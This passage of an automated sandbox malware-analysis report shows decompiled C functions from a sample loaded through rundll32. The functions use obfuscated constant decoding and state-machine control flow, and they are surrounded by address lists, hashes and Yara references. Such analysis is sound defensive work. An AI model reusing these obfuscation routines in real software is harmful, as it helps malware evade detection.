					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E00B3889D(0xb3c930, _v76, __eflags);
							_t182 =  *0xb3ca2c; // 0x505cc8
							_t206 =  *0xb3ca2c; // 0x505cc8
							E00B229E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00B32025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E00B2C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E00B2568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}

0x00b262ac
0x00b262b8
0x00b262ba
0x00b262bf
0x00b262c2
0x00b262c9
0x00b262cd
0x00b262d1
0x00b262d8
0x00b262e4
0x00b262e9
0x00b262ee
0x00b262f5
0x00b262fc
0x00b26303
0x00b26307
0x00b2630b
0x00b26312
0x00b26319
0x00b2631d
0x00b26321
0x00b26328
0x00b26333
0x00b26336
0x00b26339
0x00b26340
0x00b26347
0x00b2634e
0x00b26355
0x00b2635c
0x00b26363
0x00b2636a
0x00b26371
0x00b26378
0x00b2637f
0x00b26386
0x00b26394
0x00b26397
0x00b2639e
0x00b263a5
0x00b263ac
0x00b263b3
0x00b263ba
0x00b263be
0x00b263c5
0x00b263cc
0x00b263d3
0x00b263dd
0x00b263e0
0x00b263e3
0x00b263ea
0x00b263f1
0x00b263f5
0x00b263f9
0x00b26400
0x00b26407
0x00b26412
0x00b26419
0x00b2641c
0x00b26423
0x00b2642a
0x00b26431
0x00b26435
0x00b2643c
0x00b26448
0x00b2644f
0x00b26456
0x00b2645d
0x00b26464
0x00b2646b
0x00b26472
0x00b26479
0x00b2647d
0x00b26484
0x00b2648f
0x00b26492
0x00b26496
0x00b2649d
0x00b264a4
0x00b264a8
0x00b264af
0x00b264b6
0x00b264b6
0x00b264c4
0x00b264f7
0x00b26502
0x00b2651c
0x00b26530
0x00b2653c
0x00b2654c
0x00b26551
0x00b26554
0x00000000
0x00b264c6
0x00b264cc
0x00b264d2
0x00b264d3
0x00b264eb
0x00b264f0
0x00b264f3
0x00000000
0x00b264f3
0x00b264cc
0x00000000
0x00b264c4
0x00b2655e
0x00b2655f
0x00b2656a
0x00b2656c
0x00b2656f
0x00b26571
0x00b26577
0x00b26578
0x00b2657f
0x00b26583
0x00b26585
0x00b26588
0x00b2658d
0x00b2658d
0x00b2658d
0x00b265a1

Strings

I%p , xrefs: 00B26443

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I%p
API String ID: 0-3985577374
Opcode ID: 1549eaa8d535b24d7b294164439f629872778ae558ac956941eceee7cba2c607
Instruction ID: f8ee0400a6523edd08672b0404d6b6124ae85cdc119686c327abe3156ee0ac64
Opcode Fuzzy Hash: 1549eaa8d535b24d7b294164439f629872778ae558ac956941eceee7cba2c607
Instruction Fuzzy Hash: 448136B1D0021DABDF19CFE5D94A9DEBBB1FF44318F208159E116B62A0D7B90A09CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B30D33, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B30D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00B2602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00B38C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E00B278A5(_t158, _t158, _v16, _t158, _v8);
				E00B27787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}

0x00b30d3b
0x00b30d3e
0x00b30d40
0x00b30d43
0x00b30d47
0x00b30d48
0x00b30d4d
0x00b30d57
0x00b30d5d
0x00b30d64
0x00b30d6b
0x00b30d72
0x00b30d7f
0x00b30d82
0x00b30d85
0x00b30d8c
0x00b30d93
0x00b30da1
0x00b30da4
0x00b30dab
0x00b30db6
0x00b30db7
0x00b30dba
0x00b30dc1
0x00b30dc8
0x00b30dcf
0x00b30dd3
0x00b30dda
0x00b30de1
0x00b30de5
0x00b30dec
0x00b30df0
0x00b30df7
0x00b30e05
0x00b30e08
0x00b30e0f
0x00b30e1b
0x00b30e1e
0x00b30e25
0x00b30e2c
0x00b30e30
0x00b30e37
0x00b30e3e
0x00b30e45
0x00b30e4c
0x00b30e53
0x00b30e5e
0x00b30e61
0x00b30e73
0x00b30e78
0x00b30e7f
0x00b30e86
0x00b30e8d
0x00b30e94
0x00b30e9b
0x00b30ea7
0x00b30eaa
0x00b30eaf
0x00b30ebb
0x00b30ebe
0x00b30ec1
0x00b30ee5
0x00b30ef8
0x00b30f02
0x00b30f0b

Strings

D}0, xrefs: 00B30DC1

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D}0
API String ID: 0-882559769
Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction ID: 09e1e02f50de11a5dd03c873c7a6019f6c70c2247a7a369b2ca6d3233cba7039
Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction Fuzzy Hash: B451F3B2D0130AEBDF09CFA5D94A8EEBBB2FB44304F208199E111B6250D7B95B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B3340A, Relevance: 1.4, Strings: 1, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00B3340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E00B2B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E00B350F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E00B38F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}

0x00b33411
0x00b33418
0x00b3341a
0x00b3341b
0x00b33422
0x00b33423
0x00b33424
0x00b33429
0x00b33431
0x00b33433
0x00b3343b
0x00b3343e
0x00b33444
0x00b3344c
0x00b33451
0x00b33456
0x00b3345e
0x00b33466
0x00b3346e
0x00b33476
0x00b3347b
0x00b3348a
0x00b3348b
0x00b3348f
0x00b33497
0x00b334a4
0x00b334a8
0x00b334b0
0x00b334b8
0x00b334c0
0x00b334c8
0x00b334d0
0x00b334d8
0x00b334e0
0x00b334e8
0x00b334f0
0x00b33503
0x00b33507
0x00b3350c
0x00b33514
0x00b3351c
0x00b33524
0x00b33529
0x00b33531
0x00b33539
0x00b33541
0x00b33549
0x00b33551
0x00b33559
0x00b3355e
0x00b33566
0x00b3356e
0x00b3356e
0x00b33578
0x00b33600
0x00b33602
0x00b3357a
0x00b33580
0x00b335a2
0x00b335a7
0x00b335aa
0x00000000
0x00b33582
0x00b33588
0x00000000
0x00b3358a
0x00b3358a
0x00000000
0x00b3358a
0x00b33588
0x00b33580
0x00b33606
0x00b3360e
0x00b3360e
0x00b335c6
0x00b335cb
0x00b335ce
0x00b335d0
0x00b335d6
0x00000000
0x00b335d2
0x00b335d2
0x00000000
0x00b335d2
0x00000000
0x00b335db
0x00b335db
0x00b335db
0x00000000

Strings

@d, xrefs: 00B33549

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: @d
API String ID: 0-4219467963
Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction ID: 0ca7c7ab1e5e1e167bea67884492a1fac69fe5cc05f8ebb81c1692f41f8db07d
Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction Fuzzy Hash: 235166B11083469BD318CF21C98A91FFBE1FBE4B48F504A1DF59A92160D775CA498B87

Uniqueness

Uniqueness Score: -1.00%

Function 00B33FE7, Relevance: 1.4, Strings: 1, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B33FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E00B38F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E00B350F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E00B2B055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}

0x00b33fee
0x00b33ff5
0x00b33ff7
0x00b33ffe
0x00b33fff
0x00b34000
0x00b34005
0x00b3400d
0x00b34016
0x00b34018
0x00b34024
0x00b34029
0x00b3402f
0x00b34037
0x00b3403f
0x00b34047
0x00b3404f
0x00b34057
0x00b3405f
0x00b3406c
0x00b3406d
0x00b34071
0x00b34079
0x00b34081
0x00b34089
0x00b34091
0x00b34099
0x00b340a1
0x00b340a9
0x00b340ae
0x00b340b6
0x00b340be
0x00b340c6
0x00b340ce
0x00b340d6
0x00b340db
0x00b340e3
0x00b340eb
0x00b340fb
0x00b340ff
0x00b34107
0x00b34114
0x00b34118
0x00b34120
0x00b34120
0x00b3412a
0x00b341b1
0x00b341b3
0x00b3412c
0x00b3412e
0x00b34153
0x00b34158
0x00b3415b
0x00000000
0x00b34130
0x00b34136
0x00000000
0x00b34138
0x00b34138
0x00000000
0x00b34138
0x00b34136
0x00b3412e
0x00b341b7
0x00b341bf
0x00b341bf
0x00b34177
0x00b34179
0x00b3417f
0x00000000
0x00b3417b
0x00b3417b
0x00000000
0x00b3417b
0x00000000
0x00b34184
0x00b34184
0x00b34184
0x00000000

Strings

tx, xrefs: 00B3402F

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: tx
API String ID: 0-1414813443
Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction ID: f438fa6c092c6f6dc98ab0a55e2c2c994ff394dfad92348911e1307a28bd08db
Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction Fuzzy Hash: 6A419A715087429BE718CE21C88582FBBE1FBD8718F204A1DF5C9A62A0D775DA09CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00B260B9, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00B260B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E00B27551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E00B27663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E00B34F7D(_v32, _v28, _t127);
				}
				return _t128;
			}

0x00b260c2
0x00b260c5
0x00b260cc
0x00b260cf
0x00b260d0
0x00b260d3
0x00b260d6
0x00b260d7
0x00b260da
0x00b260db
0x00b260dc
0x00b260e1
0x00b260ea
0x00b260ee
0x00b260f0
0x00b260f4
0x00b260f8
0x00b260ff
0x00b26106
0x00b26112
0x00b26117
0x00b2611c
0x00b26123
0x00b2612a
0x00b26131
0x00b26138
0x00b2613f
0x00b26149
0x00b2614e
0x00b26153
0x00b2615a
0x00b26161
0x00b26168
0x00b2616f
0x00b26176
0x00b2617a
0x00b2617e
0x00b26182
0x00b26189
0x00b26190
0x00b26197
0x00b2619e
0x00b261a5
0x00b261b0
0x00b261b4
0x00b261b7
0x00b261bb
0x00b261c2
0x00b261cd
0x00b261d5
0x00b261d8
0x00b261eb
0x00b261f0
0x00b261f7
0x00b26211
0x00b26217
0x00b2621c
0x00b26227

Strings

%3on, xrefs: 00B26190

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: %3on
API String ID: 2962429428-3639271662
Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction ID: 73b719ff941f70b30558c95a0e04e798e542aac8f39f27960abcdf8800950214
Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction Fuzzy Hash: FD414671E0020AABDB04DFE5D98A8EEFBB5FB44704F208199E515B7250D3B89B45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2F536, Relevance: 1.3, Strings: 1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00B2F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E00B308F3(_v12, _v24, _v20, _a8, _t84, E00B2C506(_t84), _v16);
			}

0x00b2f53c
0x00b2f53f
0x00b2f542
0x00b2f543
0x00b2f544
0x00b2f549
0x00b2f550
0x00b2f559
0x00b2f566
0x00b2f567
0x00b2f56a
0x00b2f56e
0x00b2f575
0x00b2f57c
0x00b2f587
0x00b2f58a
0x00b2f591
0x00b2f598
0x00b2f59f
0x00b2f5a6
0x00b2f5ad
0x00b2f5b9
0x00b2f5bc
0x00b2f5bf
0x00b2f5c6
0x00b2f5cd
0x00b2f5d1
0x00b2f5d8
0x00b2f5df
0x00b2f5ea
0x00b2f5ed
0x00b2f5f4
0x00b2f5fb
0x00b2f602
0x00b2f609
0x00b2f610
0x00b2f617
0x00b2f61e
0x00b2f625
0x00b2f62c
0x00b2f633
0x00b2f65e

Strings

j^ , xrefs: 00B2F536

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j^
API String ID: 0-2773993462
Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction ID: 8510cb0eee73e66d7ee9682ebc202bba4aad2e9a913e2ec71a2138473d1316ff
Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction Fuzzy Hash: 8131EEB4C0070AEBDF48DFA4C98A49EBFB5FB00304F208089D515BA2A0D3B94B959F84

Uniqueness

Uniqueness Score: -1.00%

Function 1002A210, Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 1002A216, 1002A220

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: a7ae1d8958db0be8601a894f68a80e987dbc301ada32cbee45108d60bb9f4e14
Instruction ID: e8c23879367dcf5bda3c463928159e81a8616328db366f60e4f6970be69a4008
Opcode Fuzzy Hash: a7ae1d8958db0be8601a894f68a80e987dbc301ada32cbee45108d60bb9f4e14
Instruction Fuzzy Hash: 8FE0C233640234B3C210A2956C04EE97A44CF456B2F900032FB18EA522EE22181082D8

Uniqueness

Uniqueness Score: -1.00%

Function 10035BF0, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8e5a7989525394ea527459bf7471f90ccec202f3c22b3acccd88d9c4aab2da
Instruction ID: a7639446b8b4cee63292c28b4385ca5dbfe057a193b70b4a221de53670d226bc
Opcode Fuzzy Hash: 2e8e5a7989525394ea527459bf7471f90ccec202f3c22b3acccd88d9c4aab2da
Instruction Fuzzy Hash: 5DE19375A002288FDB26CF54CC81B9AB3F8FF46746F1541EAD949EB255E7319E408F81

Uniqueness

Uniqueness Score: -1.00%

Function 1002FE2A, Relevance: .3, Instructions: 327COMMON

